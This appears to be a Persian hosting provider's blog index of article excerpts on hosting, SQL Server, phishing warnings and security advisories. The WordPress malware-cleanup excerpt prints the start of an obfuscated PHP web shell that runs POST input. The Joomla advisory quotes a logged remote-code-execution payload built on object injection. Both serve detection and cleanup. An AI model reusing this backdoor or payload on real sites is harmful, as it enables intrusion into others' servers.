نویسنده: تیم تحریریه ایران‌سرور

آپدیت اساسی گوگل در هسته الگوریتم های رتبه بندی

در هفته ای که گذشت گوگل یک بروزرسانی اساسی در نحوه رتبه بندی سایت ها انجام داد. آیا شما هم تغییری در این خصوص در وب سایت های خود احساس کردید؟ Gary Illyes و John Mueller در توئیتر خود تایید کردند که آنچه وبمسترها در هفته گذشته مشاهده کردند، آپدیت الگوریتم پنگوئن گوگل که انتظارش می رفت نبوده است بلکه یک تغییر نسبی در هسته الگوریتم های رتبه بندی گوگل می باشد. برخی از کارشناسان وب سایت معتبر SearchEngineLand از این رویداد به عنوان “آپدیت عظیم” نامبرده اند. گوگل به ندرت آپدیت های اصلی خود را اعلام می دارد و این در حالی است که وبمسترها منتظر آپدیت الگوریتم پنگوئن در ماه ژانویه که دچار تاخیر شده است بودند، این موضوع منجر به اشتباهات و سردرگمی های زیادی برای مدیران وب سایت ها و وبمسترها در خصوص ارتباط این آپدیت با الگوریتم پنگوئن رخ داده است. اما نشانه ها حاکی از آن است که رویداد هفته گذشته به الگوریتم پنگوئن ارتباطی ندارد و موضوع فراتر از آن می باشد. در حال حاضر تنها آنچه مشخص است، یک بروزرسانی اساسی که بیشتر به الگوریتم پاندا(ارزش بالاتر وب سایت های با کیفیت) شبیه است می باشد. گفتنی است بر خلاف بروزرسانی ها […]

خدمات میزبانی

در مفهوم کلی خدمات میزبانی به معنی سرویس هایی است که در بستر اینترنت به کاربران ارائه می شود. محیط خدمات میزبانی یک کامپیوتر پیکربندی شده است که به ازای ارائه ی برخی از منابع و امکانات خود به مشتریان هزینه ای از آن ها دریافت خواهد کرد. از اینترنت برای اتصال سرور به کلاینت استفاده می شود و دسترسی به سرور اطلاعات، محتوا و سرویس ها از طریق اینترنت ممکن خواهد بود. انواع خدمات میزبانی در حیطه ی مفاهیم وب سایت و یا وب سرویس است اما ممکن است در برخی از موارد مفاهیم آن تغییر یابد. وب هاستینگ: مجموعه ای منحصر به فرد از برنامه های نرم افزاری یا خدمات ( مانند FTP و ایمیل) و یک محیط برای کار با زبان های برنامه نویسی مختلف ( مانند PHP، دات نت و جاوا ) فراهم می کند. فایل هاستنیگ: فایل هاستینگ امکان ذخیره سازی را در برنامه های کاربردی وب و یا سایت ها ایجاد می کند. فایل هاستینگ یک سرویس امن و ایده آل برای ذخیره سازی فایل ها است همچنین میزان از دست دادن یا سرقت فایل ها کاهش می باید. میزبانی از تصاویر: میزبان سرور امکاناتی را برای کار بر روی تصاویر و فایل های […]

ارائه دهنده خدمات مدیریت شده ( Managed Service Provider (MSP) )

تصویر شاخص مقاله MSP

MSP یک نوع از خدمات شرکت IT است که سرور، شبکه و برنامه های کاربردی تخصصی را برای کاربران و سازمان ها ارائه می دهد. این برنامه های کاربردی هاستینگ و مدیریت آن را ارائه می دهند. MSP یک مدیریت خدمات ارتباطی عمومی است مانند خط های گسترده ی شبکه ی WAN است و انواع سرویس های یک شرکت را یکپارچه و مدیریت می کند، انواع این سرویس های عبارت اند از: وب هاستینگ دسترسی استاندارد به داده ها و حمل و نقل آن ها مجوز مدیریت پشتیبانی از شبکه های ویدئویی پیام رسانی یکپارچه مدیریت نیروی انسانی و مشخصات هر فرد به طور مجزا مدیریت کامل شبکه و برون سپاری آن که شامل ویژگی هایی مثل پیام، مرکز تماس، تلفن IP، فایروال، مدیریت شبکه های خصوصی مجازی (VPS) ، نظارت و تهیه گزارش از شبکه است. ارائه دهنده خدمات میزبانی وب ( Hosting Service Provider(HSP)) HSP یک نوع از ارائه دهنده خدمات IT است که منابع IT را برای افراد و وب سایت های مبتنی بر اینترنت ارائه می دهد. ارائه دهنده خدمات میزبانی وب امکانات سخت افزاری، نرم افزاری، ذخیره سازی، شبکه و یا ترکیبی از آن ها را برای مشتریان ارائه می دهند. ارائه دهندگان خدمات میزبانی […]

‏‪‫حذف Malware های آپلود شده از طریق shell در وردپرس

‏‪‫حذف Malware های آپلود شده از طریق shell در وردپرس

اگر شما دارای تعدادی زیادی وبسایت که با وردپرس ایجاده شده اند هستید، بارها ممکن است با این مشکل روبرو شده باشید، بطور کلی بیشتر این هکرهای عزیز به دنبال فولدر هایی می گردند که سطح درستی آنها ۷۷۷ می باشد، که در وردپرس رایج ترین مسیر /wp-content/uploads/ می باشد؛ بنابراین لازم است که به دنبال فایل های آپلود شده در این مسیر بر حسب تاریخ بگردیم، بدین منظور درshell دستور زیر را اجرا کنید : find ./public_html/wp-content/uploads/ -type f -name ‘*.php’ -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort   به عنوان نمونه، نتیجه بررسی به صورت زیر می باشد: ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2013/05/blog84.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2014/10/dump.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2014/code.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2015/07/session90.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2015/09/xml96.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2015/504.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/about_us.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/contactus.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/rtbwvcsxrnbsvcd.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/sc_afsed.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/team.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/wp-upload.php   می توانید با دستور head خطوط اولیه این فایل ها را جهت بررسی محتوای آن مشاهده نمایید. به عنوان مثال در فایل blog84.php بدین صورت می باشد: head ./wp-content/uploads/2013/05/blog84.php <?php @preg_replace(‘/(.*)/e’, @$_POST[‘dnrdztvetxn’], ”); $GLOBALS[‘af4569’] = “\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5   همانطور که مشاهده می نماید این فایل ها لازم است که سریع حذف شوند. می توانید با دستور rm filename فایل مورد نظر (بعنوان مثال: blog84.php ) […]

MFT )Managed File Transfer)

تصویر شاخص مقاله MFT

MFT (مدیریت انتقال فایل) نسخه ی تکامل یافته ی تکنولوژی FTP است. زمانی که FTP برای انتقال فایل ها به اندازه کافی برای کاربران کارآمد نباشد از MFT استفاده می شود. در سطح مورد انتظار کاربران، MFT برای کنترل انتقال فایل، مدیریت و اتوماسیون فایل ها بسیار مناسب خواهد بود. به طور کلی MFT توسط سازمان هایی استفاده می شود که نیاز بیشتری به امکانات FTP یا HTTP دارند. MFT از تمام نیازهای انتقال داده پشتیبانی می کند. قابلیت های MFT امنیت: MFT سطح بالاتری از امنیت را نسبت به FTP ارائه می دهد. MFT از پروتکل های امن مانند FTPS )FTP مبتنی بر SSL و TLS) و SFTP )FTP مبتنی بر SSH) حمایت می کند. این پروتکل امنیت بیشتری تامین می کند و از رمز گذاری با هدف محافظت از اطلاعات در حمل و نقل استفاده می شود، امنیت MFT به گونه ای است که از ورود داده های جاسوسی جلوگیری می کند. مدیریت: مدیریت عملیات انتقال فایل از مهمترین قابلیت های MFT است که شامل کنترل مجوز کاربر نهایی، مدیریت ذخیره سازی فایل و انتقال آن ها، نظارت بر زمان واقعی انتقال فایل، ثبت مسیرها و … را شامل می شود. سرور MFT دید کاملی از تمام فایل […]

آسیب پذیری خط فرمان ریموت در جوملا

تیم امنیتی جوملا پس از کشف حفره امنیتی بسیار مهم خط فرمان ریموت که در تمام نسخه های جوملا از ۱.۵تا ۳.۴ وجود دارد، نسخه جدید جوملا را ارائه نمود. این یک آسیب پذیری جدی است که می تواند به راحتی مورد بهره برداری قرار گیرد و در حال حاضر بسیار خطرناک است. اگر شما از cms جوملا استفاده میکنید لازم است هم اکنون cms را بروز نمایید. اگر شما از نسخه های قدیمی (پشتیبانی نشده) ۱.۵.x و  ۲.۵.x استفاده میکنید جهت برطرف سازی اساسی مشکلات از لینک زیر استفاده نمایید. https://goo.gl/Xw5Shb این آسیب پذیری از دو روز اخیر کشف شده و تکرار میکنیم در حال حاضر بسیار خطرناک است. در log زیر می توانید این آسیب پذیری را ملاحظه نمایید: ۲۰۱۵ Dec 12 16:49:07 clienyhidden.access.log Src IP: 74.3.170.33 / CAN / Alberta ۷۴.۳.۱۷۰.۳۳ – – [۱۲/Dec/2015:16:49:40 -0500] “GET /contact/ HTTP/1.1″ ۴۰۳ ۵۳۲۲ “http://google.com/” “}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: .. {s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0: .. {}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:.. {s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:..   اگر شما از جوملا استفاده می نمایید، logهای سایت را فورا بررسی نمایید. درخواست ها از ipهای ۱۴۶.۰.۷۲.۸۳ یا ۷۴.۳.۱۷۰.۳۳ یا ۱۹۴.۲۸.۱۷۴.۱۰۶ را به عنوان اولین ipهای شروع کننده exploit بررسی نمایید. همچنین توصیه می شود در logهای سایت عبارت های JDatabaseDriverMysqli یا O: را جستجو نمایید. در صورتی […]

آشنایی با پتانسیل اینترنت در مقابله با تهدیدات امنیتی

تصویر شاخص مقاله آشنایی با پتانسیل اینترنت در مقابله با تهدیدات امنیتی

امروزه استفاده از وب سایت و سرویس های اینترنت امری اجتناب ناپذیر در زمینه ی کسب و کار مبدل شده است. در واقع اینترنت بهترین ابزار برای جلب توجه مشتریان و تسهیل در معاملات بین سازمان ها می باشد. همچنین برای کسب و کارهایی که از طریق اینترنت انجام می شود هیچ حد و مرزی وجود ندارد. با این وجود در توسعه اینترنت، به موارد امنیتی و خطرهای استفاده از آن توجه ویژه ای شده است. اینترنت تجربه ی خوبی در رابطه با سهولت انتقال اطلاعات، به کاربران داده است، اما هکرها در کمین این اطلاعات می باشند، داده هایی که توسط کاربران وارد سایت می شوند عبارت اند از نام کاربری ورود به سیستم، رمز عبور، شماره حساب، شماره کارت اعتباری و … . هر نوع استفاده از اینترنت باید به گونه ای باشد که از وب سایت ها و اطلاعات بازدیدکنندگان حفاظت کند و تهدیدات اینترنتی را پیگیری کند. معنای امنیت سرورهای امن، سرویس دهنده هایی هستند که با استفاده از پروتکل امن در لایه سوکت از اطلاعات و درخواستهای کلاینت ها محفاظت می کند. از بین پروتکل های امن، سرویس دهنده ها و مرورگرهای وب، از پروتکلSSL بیشترین استفاده را می کنند. به طور کلی بسیاری از وب […]

هاست ASP چیست؟

تصویر شاخص مقاله هاست ASP

هاست ASP بر روی سرور مبتنی بر ویندوز راه اندازی می شود، شما می توانید با استفاده از تکنولوژی ASP صفحات پویایی ایجاد کنید که با دسترسی به پایگاه داده امکان پیاده سازی داشته باشند. وب سایت با استفاده از سیستم عامل و وب سرور بر روی سرور اجرا می شود، سیستم عامل و وب سرور باید روی سرور نصب شوند. ASP برای کار با IIS ساخته شده است. IIS وب سرور ویندوزی و جزئی از سیستم عامل ویندوز است که وب سرور و توابع اینترنتی دیگر توسط این سیستم عامل قابل اجرا است. در حال حاضر شما می توانید برای برنامه های داینامیک از زبان ASP استفاده کنید. ASP چیست؟ ASP زبان سمت سروری است که برای ساخت وب سایت ها، کد برنامه های کاربردی مستقل، دسترسی به پایگاه داده (مانند SQL Server یا Microsoft Access database) و ترکیب صفحات HTML استفاده می شود. شما همیشه باید اطلاعات به روزی از ASP در دسترس داشته باشید، در حال حاضر نسخه جدیدی از ASP با نام ASP Classic به بازار ارائه شده است که تقریبا جانشین ASP.Net شده است. برای اولین بار ASP.Net در سال ۲۰۰۲ با نسخه ۱.۰ منتشر شد که در واقع جانشین ASP Classic گردید. مزایای استفاده […]

WHM یا مدیریت وب هاستینگ چیست؟

مقاله مدیریت وب هاستینگ

این مقاله راجع به نرم‌افزار WHM است و بدون هیچ مقدمه‌ای سراغ اصل مطلب می‌رویم؛ اما قبل از آن، بگذارید خیلی کوتاه در مورد چیستی WHM بگوییم. WHM چیست؟ این عبارت مخفف Web Hosting Manager است. ناگفته نماند که تمام این وب‌سایت‌ها باید از یک سرور یا هاست مشترک استفاده کنند. ویژگی‌ای که WHM را منحصر‌به‌فرد می‌کند، امکان فروش فضای هاستینگ به کاربران دیگر است. شاید سروری که تهیه کرده‌اید، امکاناتی بیش از نیازتان را ارائه دهد. پهنای باند زیاد، فضای زیاد و …. . با استفاده از WHM می‌توانید سرورتان را به هاست‌های مختلف تقسیم کنید و هر هاست را به یک کاربر بفروشید. بیایید برخی دلایلی که استفاده از این ابزار را توجیه می‌کنند را با هم مرور کنیم. چرا از WHM استفاده کنیم؟ بالاتر هم گفتیم، WHM ابزاری است که با کمک آن، مدیریت چند وب‌سایت به‌صورت هم‌زمان ممکن می‌شود. علاوه بر آن، می‌تواند ابزاری باشد برای تقسیم فضای سرور هاست و فروش آن به کاربران دیگر! این کار با ساخت هاست‌های جداگانه برای هر وب‌سایت انجام می‌شود. مقاله cPanel چیست را بخوانید تا بیشتر با آن آشنا شوید. مواردی که در ادامه می‌بینید، دلایلی هستند که استفاده از این ابزار را توجیه می‌کنند: اگر یکی از […]

هشدار مهم ایمیل فیشینگ توسط رجیسترارهای Dynadot, Above, Hexonet و سایرین

رجیسترارها از قبیل Dynadot, Above, Hexonet و دیگر رجیسترارهای مشهور با انتشار مطلبی در مورد ایمیل های فیشینگی که در ۲۴ ساعت گذشته ارسال شده است هشدار دادند. مطلب زیر هشداری است که رجیسترار Dynadot منتشر نموده است: ما اخیرا از یک abuse ایمیل فیشینگ آگاه شدیم که برای مشتریان ما ارسال شده است. این ایمیل های در حال ارسال از ایمیلی شبیه ایمیل اکانت abuse@dynadot.com ما می باشد. اما این ایمیل ها از سمت ما ارسال نمی شوند و لازم است چشم پوشی شوند. اگر شما یکی از این ایمیل ها را دریافت نمودید یا فکر میکنید که این ایمیل از سمت ما نمی باشد، هرگز بر روی لینک های آن ایمیل کلیک ننمایید، یا به آن پاسخ و یا به شماره موجود در آن تماس نگیرید. شما می توانید در عوض به ما از طریق ایمیل info@dynadot.com، چت آنلاین ما و یا شماره تلفن ۶۵۰-۲۶۲-۰۱۰۰ اطلاع دهید. در زیر یک نمونه از ایمیلی که در حال ارسال هستند آورده شده است: اگر شما از این نمونه ایمیل های فیشینگ دریافت نمودید، لطفا بر روی لینک های موجود در آن کلیک ننمایید. هر وقت شما یک ایمیل مخرب دریافت کردید ، همیشه ایمیل header آن را بررسی نمایید؛ شما […]

برطرف نمودن آسیب پذیری SQL injection در نسخه ۳.۴.۵ جوملا

تیم توسعه دهنده جوملا به دلیل بروز مشکل امنیتی مهمی، نسخه ۳.۴.۵ را جهت رفع این آسیب پذیری منتشر کرد. این آسیب پذیری خطرناک شامل SQL injection به ماژول com_contenthistory می باشد، که از طریق آن هکر می تواند به سایت نفوذ کرده و کنترل آن را به طور کامل بدست بگیرد. نسخه جدید به غیر از برطرف نمودن این مشکل امنیتی، هیچ تغییری دیگری نداشته است. در صورتی که شما کاربر این CMS می باشید (جوملا ۳.۲ و بالاتر) لازم است هم اکنون نسخه جوملای خود را بروز نمایید. SQL Injection یکی از معایب رایج در اپلیکیشن های وب است و در موارد بحرانی شبیه به این، به مهاجمان اجازه می‌دهد از طریق یک اپلیکیشن وب، به اطلاعات حساس پایگاه داده دسترسی کامل پیدا کنند. این آسیب‌پذیری سبب می‌شود کاربر غیرمجاز بتواند از راه دور و با ربودن session مدیریت؛ به‌کل وب‌سایت در سطح مدیریت دسترسی پیدا کند. این مشکل امنیتی توسط تیم TrustWave  کشف شده است. در حال حاضر به صورت تخمینی ۲.۸ میلیون وبسایت از CMS جوملا استفاده می نمایند و پس از وردپرس از محبوبیت قابل قبولی برخوردار است. در صورتی که می خواهید تشخیص دهید که سایت شما دارای این نفوذ قرار گرفته است یا […]

هاست جوملا چیست؟ چه مزایا و معایبی دارد؟

تصویر شاخص درباره هاست جوملا

هاست جوملا سازگارترین میزبان وب برای وب‌سایت‌های جوملا CMS و برنامه‌های وب نوشته شده با PHP است. از مزیت‌های این هاست آن است که نیازی به دانش عمیق درباره کدنویسی ندارید و به‌راحتی می‌توانید از آن استفاده کنید.  جوملا یکی از CMS‌های منبع باز محبوب است که میلیون‌ها کاربر وب‌سایت در سراسر جهان به آن اعتماد دارند. این پلتفرم در مقایسه با دروپال، پیچیدگی کمتری دارد، اما در مقایسه با وردپرس، کمی پیچیده‌تر است.  اگر می‌خواهید در پروژه خود از هاست جوملا استفاده کنید، باید مزایا و معایب آن را بدانید تا مطمئن شوید انتخاب درستی را انجام داده‌اید. در ادامه با ما همراه باشید تا به شما بگویم هاست جوملا چیست؟ و چه مزایا و معایبی دارد؟ هاست جوملا چیست؟  معمولا بسیاری از افراد اطلاعات خاصی درباره هاست جوملا ندارند، به همین دلیل در همان ابتدا با این سوال مواجه می‌شوند که هاست جوملا چیست؟ در پاسخ به این سوال باید گفت که جوملا یکی از بهترین سیستم‌های مدیریت محتوا (content Management system) و اپن سورس و رایگان است که از آن به‌عنوان یکی از رقبای اصلی وردپرس یاد می‌کنند.  هاست جوملا یک سرویس میزبانی مخصوص جوملا است و سازگاری بسیار خوبی با این سیستم مدیریت محتوا دارد. همچنین […]

پردازش ابری (Cloud Computing) چیست؟

پردازش ابری

پردازش ابری یک اصطلاح کامپیوتری است که از آن تعبیرهای متفاوتی برداشت می شود. از نظر علم کامپیوتر واژه ی ابر(Cloud) به معنی شبکه ای از منابع و نرم افزارهای پردازشی است که برای بهبود خدمات سرویس دهی با هم همکاری می کنند. اما برای درک دقیق تری از مفهوم پردازش ابری باید به وب هاستیگ اشاره کنیم، همه ی سرویس های وب هاستینگ ( ftp، mail و … ) که بر روی سرورهای مختلف خدمات خود را ارائه می دهند با توجه به قابلیت پردازش ابری این تضمین را می دهند که اگر یک برنامه و یا نرم افزاری در سروری دچار مشکل شود هیچ اختلالی در ارایه سرویس به کاربر به وجود نمی آید. شرکت های معتبری در زمینه هاستینگ و خدمات جانبی آن در ایران وجود دارد که توان تغییرات و بروز رسانی سرورهای خود را دارند و با عنوان سرور پردازش ابری شناخته شده است. ضمنا ایران سرور در نیمه دوم سال ۱۳۹۴ در حال پیاده سازی سیستم رایانش ابری حرفه ای و افزودن به خدمات خود می باشد. کاربرانی که از سرویس های پردازش ابری استفاده می کنند نیازی نیست که اطلاعاتی در مورد هسته این تکنولوژی داشته باشند و می توانند در هر مکان […]

Exploit و XSS چیست؟ و Zero-Day Vulnerability به چه معناست؟

Exploit چیست؟ نوعی ابزار مانند کد، نرم افزار و … می باشد که از آسیب پذیری ها و حفره های امنیتی شناسایی شده در برنامه های کاربردی، سیستم عامل ها، سخت افزار و … می تواند سوء استفاده نماید. Exploit ممکن است ترکیبی از نتیجه باگ های نرم افزاری، پسوردهای ضعیف، نرم افزار آلوده بوسیله یک کامپیوتر ویروسی یا worm، نرم افزارهای patch نشده ناشی شود. بصورت اساسی Exploit ها به دو نوع شناخته شده و شناخته نشده تقسیم می شوند. Exploit های شناخته شده تاریخچه ای دارند و ما می توانیم اقداماتی را در مقابلشان انجام دهیم. Exploit های شناخته نشده ناشی از آسیب پذیری هایی که هنوز گزارش نشده اند می باشند و این موضوع یک تهدید جدی محسوب می شوند. هکرها اغلب از Exploit ها جهت آلوده کردن تعداد زیادی از سیستم ها استفاده می کنند، در سال های اخیر تهدیدهای بسیاری با استفاده از آسیب پذیری های محصولات جاوا و Adobe مشاهده شده است. این نوع سوء استفاده از سال ۲۰۱۱ گسترده تر شده و می‌بینیم که چطور هکرها از آسیب پذیری در جاوا و ویندوز ۲۰۰۳ استفاده کردند تا سیستم ها را آلوده کرده و از کاربرها برای ذخیره کردن اطلاعات باجگیری کنند. Exploit ها […]

چگونگی کشف و رفع حفره‌های امنیتی در وردپرس

چگونگی کشف و رفع حفره‌های امنیتی در وردپرس

شاید این سوال برای شما پیش آمده باشد که چه‌گونه می‌توان تشخیص داد وب‌سایتی هک شده‌است؟ نشانه‌های آن چیست؟ و یا در صورتی که وب سایتی هک شد چه اقداماتی باید برای پاک‌سازی آن انجام داد؟ معمولا هکرها با اهداف مختلفی اقدام به هک می‌نمایند، یکی از آن‌ها استفاده از وب‌سایت برای قرار دادن صفحات phishing و ارسال ایمیل انبوه است که ممکن است در نگاه اول فایل‌های مخرب آن شناسایی نشود.  کشف و رفع حفره های امنیتی در وردپرس: برای پاکسازی وب سایت‌های وردپرس هک شده اقدامات زیر را می‌توان انجام داد: ۱. نصب یکی از افزونه‌های معتبر امنیتی وردپرس، مانند: Wordfence: یک پلاگین رایگان وردپرس است که سمت کاربر اقدام به اسکن سورس کدهای وب‌سایت می‌کند، سپس فایل‌های اصلی CMS و پلاگین‌های آن‌را با سورس اصلی وب‌سایت وردپرس (در سمت سرور) مقایسه می‌کند، در صورت مغایر بودن کدها Wordfence به شما اطلاع رسانی می‌نماید. Quttera: یک پلاگین رایگان وردپرس است که وب‌سایت را جهت وجود ویروس، Malware، تروجان، worm و دیگر فایل‌های مخرب که در قالب کدهای جاوا اسکریپت و یا کدهای مخفی eval فعالیت می‌کند، اسکن می‌کند. sucuri-scanner: این پلاگین محصول شرکت امنیتی Sucuri است. Sucuri-Scanner یکی از بهترین پلاگین‌ها برای ایمن سازی وردپرس می‌باشد .البته ناگفته نماند که Sucuri از تمرکز بیشتری […]

آسیب پذیری امنیتی OpenSSL

openssl-vulnerability

بنا بر گزارش منتشر شده در وب‌سایت رسمی OpenSSL، آسیب‌پذیری امنیتی (کد آسیب‌پذیری: CVE-2015-1793) در توابع کتابخانه­‌ای مورد استفاده OpenSSL با درجه Critical (بحرانی) کشف شده‌است. این آسیب­‌پذیری به هکرها اجازه می‌دهد در وب‌سایت‌های رمزنگاری شده توسط OpenSSl به کمک حملات Man-In-The-Middle attack جعل هویت انجام داده و حتی در شبکه‌های VPN (شبکه­ مجازی خصوصی) و سرورهای ایمیل استراق سمق نمایید.  به علت وجود مشکلی که در فرآیند Certificate Verification (بررسی صحت اعتبار­نامه­‌ها) می‌باشد، آسیب‌پذیری مذکور رخ داده و در نتیجه‌ی آن برخی از بررسی­‌های امنیتی بر روی اعتبارنامه‌­های جدید و یا اعتبارنامه‌­هایی که هنوز صحت آن‌­ها مشخص نشده­ است، صورت نمی­‌گیرد. با استفاده از این مشکل هکرها می‌توانند اعلان‌های خطای مربوط به اعتبارنامه‌­ها را دور بزنند، بنابراین قادر خواهند بود تا برنامه‌­های کاربردی را مجبور به استفاده از اعتبارنامه‌های جعلی کنند. آسیب‌پذیری مذکور اولین بار توسط دو تن از کارمندان گوگل به نام‌های Adam langley و David Benjamin گزارش شده‌است. رفع آسیب‌پذیری OpenSSL: این آسیب‌پذیری در نسخه‌های ۱.۰.2c، ۱.۰.2b، ۱.۰.1n و ۱.۰.1o وجود دارد و OpenSSL برای رفع این آسیب‌­پذیری، اعلام کرده‌است در اولین فرصت نسخه‌های OpenSSL 1.0.2b/1.0.2c به نسخه OpenSSL 1.0.2d و نسخه‌های OpenSSL 1.0.1n/1.0.1o به OpenSSL ۱.۰.1p به‌روز رسانی گردد. جهت دانلود آخرین نسخه‌ی OpenSSL می‌توانید به لینک زیر مراجعه نمایید: https://www.openssl.org/source/ راهنمای بروزرسانی نسخه OpenSSL: برای به‌روز رسانی مراحل زیر […]

‫راهکاری جهت انتقال پایگاه‌داده SQl Server از نسخه بالا به نسخه‌های پائین‌تر

مایکروسافت اس‌کیوال سرور

‫در نرم‌افزار SQL Server Management امکان بازگردانی پایگاه‌داده از نسخه بالاتر به نسخه‌های پائین‌تر وجود ندارد، به‌عنوان مثال نمی‌توانید Backup (بک‌آپ) پایگاه‌داده‌ای که از طریق نسخه ۲۰۱۲ این نرم‌افزار گرفته شده‌است را در نسخه ۲۰۰۸ آن Restore (بازگردانی) نمائید و درصورت اقدام به بازگردانی با خطای Specified Cast is not Valid مواجه خواهید شد. بهترین راهکار این است که ما همیشه از نرم افزارهای جدید و بروز شده استفاده کنیم اما  در برخی مواقع کاربر به برخی دلایل نیاز به بازگردانی در نسخه پائین‌تر دارد. جهت رفع این مشکل با استفاده از قابلیت Generate Script در MSSQL Server می‌توان از کلیه جداول همراه با داده‌های کنونی آن‌ها، viewها، Store Procedureها Script (اسکریپت) تهیه نمود و این فایل اسکریپت را در نسخه پائین‌تر اجرا و از این طریق پایگاه‌داده را به نسخه پائین‌تر منتقل نمود. البته به‌دلیل تفاوت‌های نسخه‌های مختلف ممکن است با خطاهایی مواجه شوید که در این صورت طراح پایگاه‌داده  می‌تواند به‌صورت دستی تغییرات را با توجه به نسخه پائین‌تر اعمال و خطاها را برطرف نماید. اسکریپت گرفتن از پایگاه‌داده MSSQL در مبدا: بر روی نام پایگاه‌داده کلیک راست نموده و از منو Task گزینه Generate Script را انتخاب نمائید. در صفحه بعد می‌توانید انتخاب کنید که اسکریپت از کل پایگاه‌داده یا از Objectهای خاص (مثلا […]

ارائه مدارک هویتی برای دریافت خدمات میزبانی و خرید دامنه اجباری است

ارائه مدارک هویتی برای دریافت خدمات میزبانی و خرید دامنه اجباری است

علی‌رغم گزارش منتشر شده در وب‌سایت رسمی پلیس فَتا مبنی بر این که «فروشگاه‌های اینترنتی برای خرید و تحویل کالا نیازی به مدارک هویتی ندارند.»، این امر شامل شرکت‌های هاستینگ و خدمات آن‌ها به‌ویژه خرید دامنه، اجاره هاست و مالکیت سرور نمی‌گردد. پیرو گزارش منتشر شده در وب‌سایت مجله فارسی هاستینگ (فاهومگ) و مصاحبه آن‌ها با حوزه شرکت‌های هاستینگ پلیس فتای خراسان، به دلیل این‌که امکان سوء استفاده از سرویس‌هایی مانند میزبانی و دامنه در جهت سرقت اطلاعات و کلاه‌برداری وجود دارد، مانند هر کالا و خدمات مالکیتی دیگر در صورت نیاز باید امکان بررسی و تماس با مالک آن‌ها برقرار باشد؛ به همین علت ارائه مدارک هویتی در قبال دریافت خدمات هاستینگ ضروری است.

SQL Server Snapshot

آموزش SQL Server Snapshot

یکی از قابلیت‌های SQL Server ویژگی Snapshot گرفتن از Database (پایگاه داده)‌ است. همانطور که از اسم آن نیز پیداست Snapshot به‌معنی image گرفتن از پایگاه داده می‌باشد. Snapshot پایگاه داده، viewای از پایگاه داده اصلی در زمانی‌که Snapshot ایجاد شده است را نمایش می‌دهد، بدین معنی که کلیه objectها و داده‌ها با زمانی‌که Snapshot گرفته شده‌است یکسان خواهد بود. Snapshot به‌صورت فقط خواندنی است و یک پایگاه داده می‌تواند شامل چندین Snapshot باشد. با استفاده از Snapshot در زمان‌های لازم می‌توانید تغییرات را به حالت قبل (در زمانی‌که Snapshot به‌روز شده‌است) بازگردانی نمائید. امکان حذف پایگاه داده اصلی تا زمانی‌که Snapshotها فعال باشند وجود ندارد و ابتدا باید آن‌ها را حذف نمود. Snapshotها وابسته به پایگاه داده هستند و به پایگاه داده اصلی اشاره می‌کنند؛ این امکان وجود دارد که فایل بک‌آپ پایگاه داده را به محل دیگری (سیستم مجزایی) منتقل نمود اما Snapshotها را نمی‌توان از پایگاه داده اصلی جدا نمود. مزیت استفاده از Snapshot سرعت بالای آن در هنگام ایجاد، بازگردانی و اِشغال فضای کمتر می‌باشد. ویژگی بارز Snapshot این است که Client می‌تواند پس از ایجاد بر روی آن Query (کوئری) اجرا کند و مانند فایل بک‌آپ نیاز به ایجاد یک پایگاه داده مجزا و بازگردانی بک‌آپ برروی پایگاه […]

‫‫‫قابلیت‌های Microsoft SQL Server 2014

‫قابلیت‌های Microsoft SQL Server 2014

‫Microsoft SQL Server 2014 قابلیت‌های ویژه‌ای جهت سرعت بخشیدن به کسب و کار شما دارد. در ادامه به معرفی آن‌ها خواهیم پرداخت. Microsoft (مایکروسافت) با ارائه ویژگی‌های جدید در OLTP، انبار داده‌ها و آنالیز پایگاه داده  بدون نیاز به خرید سخت افزارهای خاص  باعث افزایش سرعت اجرای Queryها می‌شود؛ علاوه بر آن قابلیت‌های دیگری را در سایر زمینه‌ها ارائه و یا بهبود بخشیده‌است. برخی از این قابلیت‌ها به‌شرح زیر می‌باشد: In-Memory OLTP: رویکردی جدید در MSSQL Server 2014،  نوع خاصی از جداول که در حافظه ذخیره می‌شوند و در برخی حالات بهبود در عملکرد را تا ۴۰ برابر افزایش می‌دهد. با استفاده از این قابلیت می‌توانید مشخص کنید جداولی که به حافظه زیادی نیاز دارند در حافظه مقیم شوند. Buffer Pool Extension: روشی برای استفاده نمودن از درایورهای SSD به‌جای Memory است. فضای مربوط به Buffer Pool بجای اینکه در RAM ذخیره شود و حافظه RAM را اشغال کند در هاردهای  SSD که از سرعت بالایی برخودارند ذخیره می‌شود. این ویژگی زمانیکه حجم دیتابیس به میزان RAM بیشتری نیاز دارد و امکان افزایش RAM نیز مقدور نمی‌باشد مفید است. Backup Encryption (رمز نگاری نسخه پشتیبان): در نسخه‌های Standard ،BI و Enterprise پشتیبانی می‌شود. MSSQL Server 2014 از چندین الگوریتم رمزنگاری، از جمله استاندارد رمزگذاری پیشرفته AES ۲۵۶ ،AES […]